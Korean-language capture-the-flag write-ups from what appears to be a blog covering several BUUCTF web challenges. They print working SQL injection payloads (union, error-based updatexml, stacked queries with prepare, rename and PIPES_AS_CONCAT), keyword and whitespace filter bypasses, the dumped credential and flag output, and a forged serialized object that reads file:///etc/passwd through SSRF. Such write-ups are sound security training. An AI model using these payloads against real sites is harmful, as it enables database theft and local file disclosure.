전에 봤던거랑 같은 문제
다만 필터링이 replace 된다
select, union, or, from 같은애들
sqli 에서 replace 될때는 seselectlect 같이 두번 넣어줘서 쉽게 우회가 가능하다
| [BUUCTF] - [极客大挑战 2019]BuyFlag1 (0) | 2020.03.06 |
|---|---|
| [BUUCTF] - [GXYCTF2019]Ping Ping Ping1 (0) | 2020.03.06 |
| [BUUCTF] - [SUCTF 2019]Pythonginx1 (0) | 2020.02.28 |
| [BUUCTF] - [极客大挑战 2019]Http1 (0) | 2020.02.28 |
| [BUUCTF] - [BUUCTF 2018]Online Tool (0) | 2020.02.28 |
view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(schema_name),3%20from%20information_schema.schemata%23&password=guest
schema_name = geek
view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27geek%27%23&password=guest
table_name = geekuser, l0ve1ysq1
view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27l0ve1ysq1%27%23&password=guest
[l0ve1ysql] column name = id,username,password
view-source:http://5898ede5-0e9d-4e2f-8e19-add666f984c1.node3.buuoj.cn/check.php?username=%27+union+select+1,group_concat(concat(id,%27-%27,username,%27-%27,password)),3%20from%20l0ve1ysq1%23&password=guest
Hello 1-cl4y-wo_tai_nan_le,2-glzjin-glzjin_wants_a_girlfriend,3-Z4cHAr7zCr-biao_ge_dddd_hm,4-0xC4m3l-linux_chuang_shi_ren,5-Ayrain-a_rua_rain,6-Akko-yan_shi_fu_de_mao_bo_he,7-fouc5-cl4y,8-fouc5-di_2_kuai_fu_ji,9-fouc5-di_3_kuai_fu_ji,10-fouc5-di_4_kuai_fu_ji,11-fouc5-di_5_kuai_fu_ji,12-fouc5-di_6_kuai_fu_ji,13-fouc5-di_7_kuai_fu_ji,14-fouc5-di_8_kuai_fu_ji,15-leixiao-Syc_san_da_hacker,16-flag-flag{bd[redacted]c5}!
| [BUUCTF] - [BUUCTF 2018]Online Tool (0) | 2020.02.28 |
|---|---|
| [BUUCTF] - [ZJCTF 2019]NiZhuanSiWei1 (0) | 2020.02.26 |
| [BUUCTF] - [极客大挑战 2019]PHP1 (0) | 2020.02.26 |
| [BUUCTF] - [0CTF 2016]piapiapia1 (0) | 2020.02.21 |
| [BUUCTF] - [RoarCTF 2019]Easy Java1 (0) | 2020.02.18 |
login, join이 있따.
특이하게 blog를 입력받는다
가입하고 내 username 클릭해보면 이렇게 내가 입력한 정보들이 나타나고, 밑에 frame에 blog주소를 띄워준다.
robots.txt를 보면 /user.php.bak을 준다.
소스를 받아보면,
대놓고 ssrf 취약점이 있는데 isValidBlog로 인해 정상적인 가입으로는 file:// 같은 스키마를 사용할 수 없다.
아까 게시판 같은 기능을 좀 더 살펴보면 no에 sqli vuln이 있는것을 확인할 수 있다.
몇가지 좀 하다보면 union sqli attack이 가능한것을 확인할 수 있다. union이랑 공백이 같이오면 ban이라 /**/로 우회했다.
error based sqli로 데이터를 가져와보자
|
/view.php?no=1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#
/view.php?no=1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#
/view.php?no=1 and updatexml(1,make_set(3,'~',(select data from users)),1)# |
대충 가져와보면 글자수 짤리는게 있는데 그런건 substr로 잘 잘라서 찔끔씩 보면 보인다.
어쨌든 스키마,테이블,컬럼, 내부데이터 다 추출해보면
| #fakebook - users -> no -> username -> passwd -> data -> USER -> CURRENT_CONNECTIONS -> TOTAL_CONNECTIONS |
이런 구조가 된다.
아직 모르는게 많아서 no,username,passwd,data 까지는 일반적인 데이타인데 뒤에 USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS 얘네는 뭐하는 애들인지 잘 모르겠다. 외부 table이랑 join된건가? 아니면 view랑 join된건가..?
어쨌든 필요한건 data인데, 앞에 no, username, passwd는 우리가 입력한 값이 박히는데(passwd는 해싱돼서 박히긴한다) data는 뭔가 구조가 이상꾸리하게 생겼다.
|
O:8:"UserInfo":3:{s:4:"name";s:4:"asdf";s:3:"age";i:1;s:4:"blog";s:13:"http://a.com/";} |
sqli 하다보면 serialize() 에러가 종종 뜨는데, 딱 생긴것만 봐도 serialize/unserialize인걸 모른다면 그런 에러메세지로 유추할 수도 있다.
이제 이걸 union에 넣으면 우리가 원하는 데이터를 unserialize해서 화면에 뿌려줄것이다.
|
O:8:"UserInfo":3:{s:4:"name";s:4:"asdf";s:3:"age";i:1;s:4:"blog";s:18:"file:///etc/passwd";} |
이제 flag.php를 같은 방식으로 가져오면,
| [BUUCTF] - [RoarCTF 2019]Easy Java1 (0) | 2020.02.18 |
|---|---|
| [BUUCTF] - [极客大挑战 2019]Secret File1 (0) | 2020.02.18 |
| [BUUCTF] - [De1CTF 2019]SSRF Me1 (0) | 2020.02.17 |
| [BUUCTF] - [极客大挑战 2019]EasySQL1 (0) | 2020.02.17 |
| [BUUCTF] - [极客大挑战 2019]Havefun1 (0) | 2020.02.17 |
냉무
| [BUUCTF] - [网鼎杯 2018]Fakebook1 (0) | 2020.02.18 |
|---|---|
| [BUUCTF] - [De1CTF 2019]SSRF Me1 (0) | 2020.02.17 |
| [BUUCTF] - [极客大挑战 2019]Havefun1 (0) | 2020.02.17 |
| [BUUCTF] - [CISCN2019 华北赛区 Day2 Web1]Hack World1 (0) | 2020.02.17 |
| [BUUCTF] - [SUCTF 2019]CheckIn1 (1) | 2020.02.15 |
1 - Hello, glzjin wants a girlfriend
2 - Do you want to be my girlfriend?
전형적인 blindsqli
이외엔 error 뿜는다
여러가지 필터링인데 () select from 안막아놨으니 걍 blind sqli 돌리면 됨
공백 필터링 되어있는데 %09로 이용가능
걍 뚝딱 하면 됨
갑자기 난이도가 떡락했넹
| [BUUCTF] - [极客大挑战 2019]EasySQL1 (0) | 2020.02.17 |
|---|---|
| [BUUCTF] - [极客大挑战 2019]Havefun1 (0) | 2020.02.17 |
| [BUUCTF] - [SUCTF 2019]CheckIn1 (1) | 2020.02.15 |
| [BUUCTF] - [RoarCTF 2019]Easy Calc1 (0) | 2020.02.14 |
| [BUUCTF] - [强网杯 2019]高明的黑客1 (0) | 2020.02.14 |
또 multiline sqli.
set @a='query';
prepare pstmt1 from @a;
execute pstmt1;
지난번엔 위에처럼 pstmt 가지고 풀었었는데 이번엔 아쉽게도 from과 '(%27)이 필터링이다.
한가지 특이한점은 어떤값을 넣어도 1이 나온다는 것이다.
이로 미루어보아
select $_GET["q"]||1 from Flag;
처럼 쿼리가 구성이 되어있지 않을까 유추해볼 수 있따
근데 찾아보니 이건 unintended라고 한다.
intended
예상 쿼리가 {input}||1이 아니라 {input}||flag였다고 하네?
| 1;set sql_mode=PIPES_AS_CONCAT;select 1 |
||를 concat으로 해석하게 하여 플래그를 출력한다는 것이당,,,
oracle에선 ||이 기본으로 concat이 되지만 mysql에선 or 와 동일하다. 이 모드를 바꿔주는것,,
| [BUUCTF] - [强网杯 2019]高明的黑客1 (0) | 2020.02.14 |
|---|---|
| [BUUCTF] - [HCTF 2018]admin1 (0) | 2020.02.13 |
| [BUUCTF] - [护网杯 2018]easy_tornado1 (0) | 2020.02.13 |
| [BUUCTF] - [强网杯 2019]随便注1 (0) | 2020.02.12 |
| [BUUCTF] - [HCTF 2018]WarmUp1 (2) | 2020.02.11 |
하.. 중국어라 번역이 잘 안돼서 좀 짜증나긴 하지만 그래도 괜찮다.
보이는가? 이 개발 번역이
허..
오 sqli..
오 필터링..
주요 문법들이 다 안된다.
만고의 sqli 삽질 끝에 뭔지 몰겠어서 찾아보니 아니 이럴수가..
앗... multi query라니..
존재만 알고 CTF나 문제로 한번도 나온적이 없어서 생각의 틀에 갇혀있었던 것 같다.
multi query에서 할 수 있는 공격은 찾아보니
preg_match로 필터링 하는것 중에 rename이 필터링 안되어 있어서
1. 현재 조회되고있는 테이블 명을 rename으로 tmp로 변경
2. flag가 담겨있는 테이블을 현재 조회되고있는 테이블명으로 변경
3. '||1# attack
이런 방법이 있었다.
근데 이보다 더 쉬운 방법이 있는데, mysql 자체에서 제공하는 prepared statement 기능을 이용하는 것이다.
| [BUUCTF] - [强网杯 2019]高明的黑客1 (0) | 2020.02.14 |
|---|---|
| [BUUCTF] - [HCTF 2018]admin1 (0) | 2020.02.13 |
| [BUUCTF] - [SUCTF 2019]EasySQL1 (0) | 2020.02.13 |
| [BUUCTF] - [护网杯 2018]easy_tornado1 (0) | 2020.02.13 |
| [BUUCTF] - [HCTF 2018]WarmUp1 (2) | 2020.02.11 |